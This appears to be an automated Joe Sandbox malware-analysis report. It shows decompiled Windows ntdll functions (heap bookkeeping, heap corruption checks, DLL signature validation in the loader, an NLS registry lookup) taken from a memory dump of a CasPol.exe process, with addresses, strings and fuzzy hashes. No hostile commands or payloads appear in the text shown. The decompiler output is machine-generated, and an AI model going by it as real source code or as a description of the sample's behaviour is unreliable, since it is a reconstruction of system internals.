                                                                        0x013ead96
                                                                        0x013ead99
                                                                        0x0142a063
                                                                        0x0142a065
                                                                        0x0142a070
                                                                        0x0142a070
                                                                        0x0142a070
                                                                        0x0142a08d
                                                                        0x0142a08d
                                                                        0x013eada4
                                                                        0x013eada6
                                                                        0x00000000
                                                                        0x013eada6
                                                                        0x013ead8e
                                                                        0x013ead6d
                                                                        0x013ead3c
                                                                        0x013ead3c
                                                                        0x00000000
                                                                        0x013ead3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013eacd8

                                                                        Strings
                                                                        • HEAP: , xrefs: 0142A0BA
                                                                        • HEAP[%wZ]: , xrefs: 0142A0AD
                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0142A0CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                        • API String ID: 0-1340214556
                                                                        • Opcode ID: 09805b016fd136831ce8f99598f7ae9d3875eec213314230becdbd39ed5697c5
                                                                        • Instruction ID: b5a76055f6869f36defb6eef5b6c1707534b54ea01f075990b8913905951852e
                                                                        • Opcode Fuzzy Hash: 09805b016fd136831ce8f99598f7ae9d3875eec213314230becdbd39ed5697c5
                                                                        • Instruction Fuzzy Hash: E381E471204794EFE726CB6CC898BAABBF8FF04718F1441A5E541877A2D779E980CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DB73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E013DB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0147A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x14a8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E013BB150();
					__eflags =  *0x14a7bc8;
					if(__eflags == 0) {
						E01472073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0147A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x14a8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x14a8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E013DB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0147A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E013DE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                        0x013db746
                                                                        0x013db74b
                                                                        0x013db74d
                                                                        0x013db750
                                                                        0x013db755
                                                                        0x013db758
                                                                        0x013db758
                                                                        0x013db75e
                                                                        0x013db763
                                                                        0x013db764
                                                                        0x013db76a
                                                                        0x013db76d
                                                                        0x013db771
                                                                        0x013db776
                                                                        0x013db85c
                                                                        0x013db85d
                                                                        0x013db860
                                                                        0x013db865
                                                                        0x01422ba1
                                                                        0x01422ba2
                                                                        0x01422ba9
                                                                        0x01422bae
                                                                        0x01422bae
                                                                        0x013db77c
                                                                        0x013db77c
                                                                        0x013db77c
                                                                        0x013db785
                                                                        0x013db788
                                                                        0x01422bb6
                                                                        0x01422bb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422bbf
                                                                        0x01422bc5
                                                                        0x01422bc9
                                                                        0x01422be8
                                                                        0x01422bed
                                                                        0x01422bcb
                                                                        0x01422be0
                                                                        0x01422be5
                                                                        0x01422bf3
                                                                        0x01422bf8
                                                                        0x01422bfd
                                                                        0x01422c05
                                                                        0x01422c0e
                                                                        0x01422c0e
                                                                        0x00000000
                                                                        0x013db78e
                                                                        0x013db78e
                                                                        0x013db78e
                                                                        0x013db791
                                                                        0x013db791
                                                                        0x013db797
                                                                        0x013db797
                                                                        0x013db79f
                                                                        0x013db7a9
                                                                        0x013db7af
                                                                        0x013db7af
                                                                        0x013db7b1
                                                                        0x013db7b6
                                                                        0x013db7e2
                                                                        0x013db7e2
                                                                        0x013db7e7
                                                                        0x013db880
                                                                        0x013db7ed
                                                                        0x013db7ed
                                                                        0x013db7ed
                                                                        0x013db7ef
                                                                        0x013db7f2
                                                                        0x013db7f2
                                                                        0x013db7f5
                                                                        0x013db7fa
                                                                        0x01422c2d
                                                                        0x01422c2e
                                                                        0x01422c39
                                                                        0x013db800
                                                                        0x013db800
                                                                        0x013db802
                                                                        0x013db805
                                                                        0x013db808
                                                                        0x013db808
                                                                        0x013db80a
                                                                        0x013db80d
                                                                        0x013db816
                                                                        0x013db81c
                                                                        0x013db822
                                                                        0x013db82f
                                                                        0x013db88b
                                                                        0x013db892
                                                                        0x013db897
                                                                        0x013db899
                                                                        0x013db89b
                                                                        0x013db89e
                                                                        0x013db8a5
                                                                        0x013db8a8
                                                                        0x013db8aa
                                                                        0x013db8ac
                                                                        0x013db8ac
                                                                        0x013db8aa
                                                                        0x013db892
                                                                        0x013db831
                                                                        0x013db839
                                                                        0x013db83b
                                                                        0x013db83b
                                                                        0x013db844
                                                                        0x013db84b
                                                                        0x013db852
                                                                        0x013db7b8
                                                                        0x013db7ba
                                                                        0x013db7bf
                                                                        0x013db7c4
                                                                        0x01422c18
                                                                        0x01422c19
                                                                        0x01422c23
                                                                        0x013db7ca
                                                                        0x013db7ca
                                                                        0x013db7cc
                                                                        0x013db7cf
                                                                        0x013db7d1
                                                                        0x013db7d1
                                                                        0x013db7d4
                                                                        0x013db7dc
                                                                        0x013db8bb
                                                                        0x013db8bb
                                                                        0x013db8be
                                                                        0x013db8be
                                                                        0x013db8c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013db8c3
                                                                        0x013db8c5
                                                                        0x013db8c7
                                                                        0x013db8e0
                                                                        0x00000000
                                                                        0x013db8e0
                                                                        0x013db8cc
                                                                        0x013db8cc
                                                                        0x00000000
                                                                        0x013db8cc
                                                                        0x013db8d6
                                                                        0x013db8d6
                                                                        0x00000000
                                                                        0x013db7dc
                                                                        0x013db7b6

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: 329b358325c242b0756c8fb3ed44c94f4b3d89f572d21cb1848d886b475219cf
                                                                        • Instruction ID: f6f440d585d0592774362254137be56067f78d852fcad6e5b026b1cb428d48f3
                                                                        • Opcode Fuzzy Hash: 329b358325c242b0756c8fb3ed44c94f4b3d89f572d21cb1848d886b475219cf
                                                                        • Instruction Fuzzy Hash: D561FF716002419FDB29CF28D481B6AFFE5FF06308F5A856EE8498B759D770E881CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E013C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E013CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E013BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x14a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01435510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x14a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E013D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E013D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01437016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E013D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E013D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01437016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E013EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E013BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                        0x013c7e4c
                                                                        0x013c7e50
                                                                        0x013c7e55
                                                                        0x013c7e58
                                                                        0x013c7e5d
                                                                        0x013c7e71
                                                                        0x013c7f33
                                                                        0x013c7e77
                                                                        0x013c7e77
                                                                        0x013c7e79
                                                                        0x013c7e79
                                                                        0x013c7e7e
                                                                        0x013c7f45
                                                                        0x01419848
                                                                        0x00000000
                                                                        0x01419848
                                                                        0x013c7f4e
                                                                        0x013c7f53
                                                                        0x013c7f5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141985a
                                                                        0x01419862
                                                                        0x01419866
                                                                        0x00000000
                                                                        0x0141986c
                                                                        0x00000000
                                                                        0x0141986c
                                                                        0x013c7e84
                                                                        0x013c7e84
                                                                        0x013c7e8d
                                                                        0x01419871
                                                                        0x013c7eb8
                                                                        0x013c7ec0
                                                                        0x013c7ec0
                                                                        0x013c7e9a
                                                                        0x0141987e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01419884
                                                                        0x0141988b
                                                                        0x014198a7
                                                                        0x014198ac
                                                                        0x014198b1
                                                                        0x014198b6
                                                                        0x014198b8
                                                                        0x014198b8
                                                                        0x014198b9
                                                                        0x00000000
                                                                        0x014198b9
                                                                        0x013c7ea0
                                                                        0x013c7ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c7eac
                                                                        0x013c7eb1
                                                                        0x013c7ec6
                                                                        0x013c7ed0
                                                                        0x014198cc
                                                                        0x013c7ed6
                                                                        0x013c7ed6
                                                                        0x013c7ed6
                                                                        0x013c7ede
                                                                        0x013c7ee3
                                                                        0x014198e3
                                                                        0x014198f0
                                                                        0x01419902
                                                                        0x014198f2
                                                                        0x014198fb
                                                                        0x014198fb
                                                                        0x01419907
                                                                        0x0141991d
                                                                        0x0141991d
                                                                        0x01419907
                                                                        0x014198e3
                                                                        0x013c7ef0
                                                                        0x013c7f14
                                                                        0x013c7f14
                                                                        0x013c7f1e
                                                                        0x01419946
                                                                        0x013c7f24
                                                                        0x013c7f24
                                                                        0x013c7f24
                                                                        0x013c7f2c
                                                                        0x0141996a
                                                                        0x01419975
                                                                        0x01419975
                                                                        0x0141997e
                                                                        0x01419993
                                                                        0x01419993
                                                                        0x0141997e
                                                                        0x00000000
                                                                        0x013c7ef2
                                                                        0x013c7efc
                                                                        0x013c7f0a
                                                                        0x013c7f0e
                                                                        0x01419933
                                                                        0x00000000
                                                                        0x01419933
                                                                        0x00000000
                                                                        0x013c7f0e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c7eb1

                                                                        Strings
                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01419891
                                                                        • LdrpCompleteMapModule, xrefs: 01419898
                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 014198A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                        • API String ID: 0-1676968949
                                                                        • Opcode ID: b93009c498754632d97769579c537e994e28dbfbd7f32cbcc75e5bc44925ef1a
                                                                        • Instruction ID: 4394b2bc879654a90ed77f0303dc027bf2b5a3f86bcb7d36cfdcda7eed15a3f3
                                                                        • Opcode Fuzzy Hash: b93009c498754632d97769579c537e994e28dbfbd7f32cbcc75e5bc44925ef1a
                                                                        • Instruction Fuzzy Hash: B751E1326007469BEB21CB6DC994B6ABBE4AB01B1CF0405AEED559B7E5D730ED00CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014623E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E014623E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x14a874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x14a874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0140D4F0(_t83, 0x1396c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E013BB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x14a6378 = 1;
						asm("int3");
						 *0x14a6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                        0x014623e3
                                                                        0x014623e8
                                                                        0x014623eb
                                                                        0x014623ee
                                                                        0x014623f3
                                                                        0x0146259b
                                                                        0x0146259b
                                                                        0x0146259d
                                                                        0x014625a3
                                                                        0x014625a3
                                                                        0x014623fb
                                                                        0x01462424
                                                                        0x0146244f
                                                                        0x01462460
                                                                        0x01462451
                                                                        0x01462451
                                                                        0x01462456
                                                                        0x01462458
                                                                        0x01462458
                                                                        0x0146245b
                                                                        0x0146245b
                                                                        0x01462426
                                                                        0x01462431
                                                                        0x01462436
                                                                        0x01462443
                                                                        0x01462438
                                                                        0x01462438
                                                                        0x01462438
                                                                        0x01462445
                                                                        0x01462445
                                                                        0x01462463
                                                                        0x01462469
                                                                        0x0146246f
                                                                        0x01462480
                                                                        0x01462495
                                                                        0x014624a1
                                                                        0x014624ce
                                                                        0x014624df
                                                                        0x014624d0
                                                                        0x014624d0
                                                                        0x014624d5
                                                                        0x014624d7
                                                                        0x014624d7
                                                                        0x014624da
                                                                        0x014624da
                                                                        0x014624a3
                                                                        0x014624b0
                                                                        0x014624b5
                                                                        0x014624c2
                                                                        0x014624b7
                                                                        0x014624b7
                                                                        0x014624b7
                                                                        0x014624c4
                                                                        0x014624c4
                                                                        0x014624e8
                                                                        0x01462497
                                                                        0x0146249a
                                                                        0x0146249a
                                                                        0x01462482
                                                                        0x01462488
                                                                        0x01462488
                                                                        0x01462471
                                                                        0x01462479
                                                                        0x01462479
                                                                        0x014624ef
                                                                        0x014623fd
                                                                        0x01462401
                                                                        0x01462412
                                                                        0x01462403
                                                                        0x01462403
                                                                        0x01462408
                                                                        0x0146240a
                                                                        0x0146240a
                                                                        0x0146240d
                                                                        0x0146240d
                                                                        0x0146241b
                                                                        0x0146241b
                                                                        0x014624f1
                                                                        0x014624f6
                                                                        0x01462507
                                                                        0x01462510
                                                                        0x00000000
                                                                        0x01462510
                                                                        0x0146250b
                                                                        0x00000000
                                                                        0x014624f8
                                                                        0x014624f8
                                                                        0x014624fc
                                                                        0x01462500
                                                                        0x01462512
                                                                        0x01462515
                                                                        0x0146251a
                                                                        0x01462521
                                                                        0x01462524
                                                                        0x01462529
                                                                        0x0146252f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0146253c
                                                                        0x0146255c
                                                                        0x01462561
                                                                        0x0146253e
                                                                        0x01462554
                                                                        0x01462559
                                                                        0x0146256a
                                                                        0x0146256d
                                                                        0x01462574
                                                                        0x01462586
                                                                        0x01462588
                                                                        0x0146258f
                                                                        0x01462590
                                                                        0x01462590
                                                                        0x01462597
                                                                        0x00000000
                                                                        0x01462597

                                                                        Strings
                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0146256F
                                                                        • HEAP: , xrefs: 0146255C
                                                                        • HEAP[%wZ]: , xrefs: 0146254F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                        • API String ID: 0-3815128232
                                                                        • Opcode ID: fafc52967e074c5dff5cbc923ec9fab715811cd0729385ae75577492b76cc7bb
                                                                        • Instruction ID: 81ff2bcf1427b4a41e1eff7126306888f583be9b8f5ead65373c942e42b8a1c3
                                                                        • Opcode Fuzzy Hash: fafc52967e074c5dff5cbc923ec9fab715811cd0729385ae75577492b76cc7bb
                                                                        • Instruction Fuzzy Hash: B5514934100260AAE374CE1EC844F727BF9DB4424CF45486BE9C28B7A5D6B5D843DB22
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013BE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E013BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E013BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E013F95D0();
						}
						if(_t78 != 0) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E013FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E013FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
